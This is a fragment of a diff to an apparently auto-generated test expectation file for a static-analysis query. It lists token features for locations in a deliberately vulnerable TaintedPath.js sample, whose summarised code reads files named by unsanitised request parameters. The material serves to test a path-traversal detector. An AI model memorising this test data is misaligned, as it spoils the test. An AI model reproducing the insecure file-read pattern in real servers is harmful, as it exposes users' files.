write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:8:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | functio ... h)));\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | functio ... h)));\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | functio ... h)));\\n} | calleeImports | http | @@ -4681,6 +58199,86 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | functio ... h)));\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | functio ... h)));\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | functio ... h)));\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:32:61:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:41:8:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:8:46:8:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:7:9:48 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:16 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:16 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:16 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:16 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:22 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:22 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:37 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:43 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:43 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:48 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:14:9:48 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:18:9:22 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:18:9:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:18:9:22 | parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:18:9:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:18:9:22 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:9:24:9:26 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:24:9:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:24:9:26 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:24:9:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:24:9:26 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:9:24:9:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:9:24:9:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:9:24:9:30 | req.url | calleeImports | url | @@ -4690,6 +58288,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:9:24:9:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:9:24:9:30 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:9:24:9:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:9:28:9:30 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:28:9:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:9:28:9:30 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:9:28:9:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:9:28:9:30 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:9:33:9:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:9:33:9:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:9:33:9:36 | true | calleeImports | url | @@ -4699,6 +58302,56 @@ 